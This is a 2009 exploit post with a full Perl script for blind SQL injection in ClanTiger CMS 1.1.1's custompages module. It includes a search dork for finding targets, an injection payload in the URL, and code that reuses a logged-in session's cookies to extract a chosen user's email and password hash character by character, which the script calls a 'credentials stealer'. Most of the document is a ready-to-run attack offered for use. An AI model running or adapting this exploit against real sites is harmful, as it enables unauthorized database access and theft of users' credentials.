clantiger-blindsql.txt
Posted on 18 April 2009
#!/usr/bin/perl # #------------------------------------------------- # (module custompage.php) BLIND SQL INJECTION #------------------------------------------------- # # CMS INFORMATION: # #-->WEB: http://www.clantiger.com #-->DOWNLOAD: http://www.clantiger.com/download-clan-cms #-->DEMO: http://www.demo.clantiger.com/ #-->CATEGORY: CMS / Portals #-->DESCRIPTION: ClanTiger is a content management system specifically designed for gaiming # clans... # # CMS VULNERABILITY: # #-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default) #-->DORK: "Powered by ClanTiger" #-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT #-->AFFECT VERSION: LAST = 1.1.1 (1.1 too) #-->Discovered Bug date: 2009-04-11 #-->Reported Bug date: 2009-04-11 #-->Fixed bug date: Not fixed #-->Info patch (????): Not fixed #-->Author: YEnH4ckEr #-->mail: y3nh4ck3r[at]gmail[dot]com #-->WEB/BLOG: N/A #-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo. # #-------------- #BUG FILE: #-------------- # #Path --> [HOME_PATH]/modules/custompages.php # #It contents: # # function main() # { # # ... # # $page = new CustomPage(); # $page->slug = $_GET['slug']; # $page->getBy(array('slug')); # # if(!$page->id) # { # throw new cccException('The page you are looking for is currently unavailable. You may need to STOP! Hammertime. If School Is Out, You should try reloading this page.','Page not found'); # } # # $tpl->define('title',$page->title); # $tpl->define('content',$page->content); // we allow HTML here, no safeoutput # # $this->pageDetails->setTitle($page->title); # $this->pageDetails->addKeyword($page->keywords); # $this->pageDetails->setDescription($page->description); # # $this->content = $tpl->publish(); # $this->display(); # } # #--------------- #CONDITIONS: #--------------- # #**DB_PREFIX="" (Default) # # maybe: db, db_clan, ... # #**Exist a custompage # #**gpc_magic_quotes=off # #------------------------------------------ #PROOF OF CONCEPT (BLIND SQL INJECTION): #------------------------------------------ # #[HOME_PATH]/modules/custompages.php?slug=the_custom_page' [BLIND SQL INJECTION] # #------------- #EXAMPLE: #------------- # #[HOME_PATH]/modules/custompages.php?slug=the_custom_page'%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/* # #Result: admin's username has 5 characters (maybe = admin? :P) # #******************************************************************* # GREETZ TO: Str0ke, JosS and all spanish Hack3Rs community! #******************************************************************* # use LWP::UserAgent; use HTML::TreeBuilder 2.96; #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Clan Tiger CMS (module custompages.php) BLIND SQL Injection Exploit"); system ("color 02"); } } sub request { my $cookie="CCC_LANG=en;"." CCC_UID=".$_[0]."; CCC_CODE=".$_[1].";"; my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); my $request = HTTP::Request -> new(GET => $_[2]); $request->header(cookie => $cookie); my $outcode= $userag->request($request)->as_string; return $outcode; } sub helper { print " [**] Clan Tiger CMS - BLIND SQL Injection Exploit "; print " [??] USAGE MODE: [??] "; print " [**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX] "; print " [**] [HOST]: Web attacked. "; print " [**] [PATH]: Home Path. "; print " [**] [uid]: The CCC_UID cookie. "; print " [**] [code]: The CCC_CODE cookie. "; print " [**] [slug]: Title custompage. "; print " [**] [id]: Exploiting id user. Default: 1 (**optional) "; print " [**] [DB_PREFIX]: Global var needed. Default: null (**optional) "; print " [**] Example: perl $0 www.example.es Clan-tiger-111 f717716... "; print " [**] ...2e1a50db06c0f2fe8804885ac2c01390 namecustompage 1 "" "; } sub mail{ $output=&request($_[0],$_[1],$_[2]); my $root = HTML::TreeBuilder->new_from_content($output); # source file $email= $root->look_down('_tag','td','style','width: 70%'); print " ----------------------------------------------------------------- "; print " Mail captured!.Getting password hash. Wait for a moment... "; print " ----------------------------------------------------------------- "; return $email -> as_text(); $root->delete(); } sub password { #Second password... $j=1; $i=48; while(($j<=32) && ($i<=126)){ my $finalrequest=$_[4]."'+AND+ascii(substring((SELECT+password+FROM+".$_[0]."members+WHERE+id=".$_[1]."),".$j.",1))=".$i."+/*"; $output=&request($_[2],$_[3],$finalrequest); if ( $output =~ (/<title>/.$custompage)) { $pass=$pass.chr($i); $j++; $i=47; } if($i==57) { $i=96; } #new char $i++; } #Error if(($i>127) || ($j>32)){ if(!$pass){ print " ----------------------------------------------------------------- "; print(" EXPLOIT FAILED! "); print(" Fatal error: Datas doesn't find! "); print " ----------------------------------------------------------------- "; exit(1); } } return $pass; } #Main &lw; print " ######################################################### "; print " ######################################################### "; print " ## Clan Tiger CMS - BLIND SQL Injection Exploit ## "; print " ## ++Conditions: Need a register user,a custompage ## "; print " ## and DB_PREFIX (default:null) ## "; print " ## Author: Y3nh4ck3r ## "; print " ## Contact:y3nh4ck3r[at]gmail[dot]com ## "; print " ## Proud to be Spanish! ## "; print " ######################################################### "; print " ######################################################### "; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; my $uid=$ARGV[2]; my $code=$ARGV[3]; my $custompage=$ARGV[4]; #Build the uri my $finalhost="http://".$host."/".$path."/index.php?module=custompages&slug="; $finalhost=$finalhost.$custompage; #Check all variables needed $numArgs = $#ARGV + 1; if($numArgs<=4) { &helper; exit(1); } #Id-user is optional.Default:1 if(!$ARGV[5]){ $idhack="1"; }else{ $idhack=$ARGV[5]; } if(!$ARGV[6]){ $db_prefix=""; }else{ $db_prefix=$ARGV[6]; } #Testing my $finalrequest = $finalhost; $output=&request($uid,$code,$finalrequest); if ( $output =~ /<div class="title">Access denied</div>/) { print " ----------------------------------------------------------------- "; print " Your credentials are not correct! This exploits need login. "; print " Options: [your-id-user],[your-password] incorrect. "; print " Exploit failed! No luck! "; print " ----------------------------------------------------------------- "; exit(1); } if ( $output =~ /<div class="title">Page not found</div>/) { print " ----------------------------------------------------------------- "; print " Custom page doesn't exist! Maybe no there on this server! "; print " Option: [slug-get-var] incorrect. "; print " Exploit failed! No luck! "; print " ----------------------------------------------------------------- "; exit(1); } if ( $output =~ (/<title>/.$custompage)) { print " ----------------------------------------------------------------- "; print " This Web could be vulnerable! "; print " The custompage exists! "; print " Testing Blind SQL Injection... "; print " ----------------------------------------------------------------- "; }else{ print " ----------------------------------------------------------------- "; print " Custompage doesn't exist! "; print " EXPLOIT FAILED! "; print " ----------------------------------------------------------------- "; exit(1); } #Test blind sql injection my $finalrequest=$finalhost."'+AND+1=1+/*"; $output=&request($uid,$code,$finalrequest); if ( $output =~ (/<title>/.$custompage)) { print " ----------------------------------------------------------------- "; print " This Web is really vulnerable! "; print " Tested Blind SQL Injection. "; print " Checking id user and DB_PREFIX null... "; print " ----------------------------------------------------------------- "; }else{ print " ----------------------------------------------------------------- "; print " This Web is not vulnerable (Maybe patched)! "; print " EXPLOIT FAILED! "; print " ----------------------------------------------------------------- "; exit(1); } #Test if user exists and DB_PREFIX my $finalrequest=$finalhost."'+AND+(SELECT+COUNT(*)+from+".$db_prefix."members+WHERE+id=".$idhack.")+/*"; $output=&request($uid,$code,$finalrequest); if ( $output =~ (/<title>/.$custompage)) { print " ----------------------------------------------------------------- "; print " OK...The user exists and DB_PREFIX is '".$db_prefix."'! "; print " Starting exploit... "; print " ----------------------------------------------------------------- "; print " Wait several minutes... "; print " ----------------------------------------------------------------- "; }else{ print " ----------------------------------------------------------------- "; print " User doesn't exists or DB_PREFIX not '".$db_prefix."' "; print " EXPLOIT FAILED! "; print " ----------------------------------------------------------------- "; exit(1); } #OK, now we get the mail user from web #i got it from blind sql but this method is faster and reduce time of injection #First email... my $hostmail="http://".$host."/".$path."/index.php?module=profiles&action=view&id=".$idhack; $mail=&mail($uid,$code,$hostmail); $passhash=&password($db_prefix,$idhack,$uid,$code,$finalhost); print " ************************************************* "; print " **** EXPLOIT EXECUTED (CREDENTIALS STEALER) **** "; print " ************************************************* "; print " User-id:".$idhack." "; print " User-email:".$mail." "; print " User-password(hash):".$passhash." "; print " ----------------------FINISH!-------------------- "; print " ---------------Thanks to: y3hn4ck3r-------------- "; print " ------------------------EOF---------------------- "; exit(1); #Ok...all job done
